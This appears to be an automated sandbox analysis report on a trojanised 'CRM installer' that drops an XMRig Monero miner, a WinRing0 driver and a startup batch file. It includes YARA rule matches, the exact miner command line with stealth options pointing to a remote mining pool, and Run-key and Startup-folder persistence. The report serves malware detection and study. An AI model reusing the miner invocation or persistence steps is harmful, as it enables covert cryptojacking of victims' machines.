Source: process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, process.exe, 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, xmrig.exe.0.dr	String found in binary or memory: https://xmrig.com/wizard
Source: process.exe, 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, process.exe, 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, xmrig.exe.0.dr	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49706 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 9.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 9.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 2.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 2.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 2.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 2.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000000.2396664069.00007FF6D9861000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 00000002.00000000.2172219039.00007FF6D9861000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: Process Memory Space: process.exe PID: 6848, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: process.exe PID: 7108, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

File created: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\WinRing0x64.sys

Jump to behavior

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\System\process.exe (copy) 49DA580656E51214D59702A1D983EFF143AF3560A344F524FE86326C53FB5DDB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: xmrig.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: config.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: pTVKHqys2h.exe	Static PE information: Number of sections : 11 > 10

Source: pTVKHqys2h.exe, 00000000.00000000.2064570484.00007FF76760E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamecs-applicant-crm-installer.exe0 vs pTVKHqys2h.exe
Source: pTVKHqys2h.exe	Binary or memory string: OriginalFilenamecs-applicant-crm-installer.exe0 vs pTVKHqys2h.exe

Source: 9.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 9.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 9.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 9.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 2.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 2.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 2.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 2.0.process.exe.7ff6d9860000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000002.00000000.2172701938.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000000.2397015865.00007FF6D9F3A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000000.2396664069.00007FF6D9861000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 00000002.00000000.2172219039.00007FF6D9861000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: Process Memory Space: process.exe PID: 6848, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: process.exe PID: 7108, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: config.exe.0.dr	Binary string: Failed to open \Device\Afd\Mio: hSM@
Source: config.exe.0.dr	Binary string: AfdPollInfo\Device\Afd\Mio
Source: WinRing0x64.sys.0.dr	Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.expl.evad.mine.winEXE@11/15@2/3

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\info.txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

File created: C:\Users\user\AppData\Local\Temp\System

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat" "

Source: pTVKHqys2h.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: pTVKHqys2h.exe

ReversingLabs: Detection: 15%

Source: pTVKHqys2h.exe	String found in binary or memory: /load_hpack; header malformed -- pseudo not at head of block8
Source: pTVKHqys2h.exe	String found in binary or memory: Sink { .. }/home/kali/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.42.0/src/net/addr.rs
Source: pTVKHqys2h.exe	String found in binary or memory: OriginalFilenamecs-applicant-crm-installer.exe0

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

File read: C:\Users\user\Desktop\pTVKHqys2h.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pTVKHqys2h.exe "C:\Users\user\Desktop\pTVKHqys2h.exe"
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Process created: C:\Users\user\AppData\Local\Temp\System\process.exe "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\System32\config.exe "C:\Users\user\AppData\Local\System32\config.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\System32\config.exe "C:\Users\user\AppData\Local\System32\config.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\System\process.exe "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Process created: C:\Users\user\AppData\Local\Temp\System\process.exe "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\System\process.exe "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background	Jump to behavior

Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\System32\config.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System\process.exe	Section loaded: rsaenh.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\System\process.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32

Jump to behavior

Source: pTVKHqys2h.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: pTVKHqys2h.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: pTVKHqys2h.exe

Static file information: File size 8126322 > 1048576

Source: pTVKHqys2h.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x435600
Source: pTVKHqys2h.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x103c00

Source: pTVKHqys2h.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.0.dr

Source: pTVKHqys2h.exe	Static PE information: section name: .xdata
Source: xmrig.exe.0.dr	Static PE information: section name: .xdata
Source: config.exe.0.dr	Static PE information: section name: .xdata

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

File created: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\Desktop\pTVKHqys2h.exe	File created: C:\Users\user\AppData\Local\Temp\System\process.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	File created: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe	Jump to dropped file
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	File created: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	File created: C:\Users\user\AppData\Local\System32\config.exe	Jump to dropped file

Boot Survival

Drops script or batch files to the startup folder

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat

Jump to dropped file

Source: C:\Users\user\Desktop\pTVKHqys2h.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat

Jump to behavior

Source: C:\Users\user\Desktop\pTVKHqys2h.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\info.txt			Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat			Jump to behavior

Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run config			Jump to behavior
Source: C:\Users\user\Desktop\pTVKHqys2h.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run config			Jump to behavior

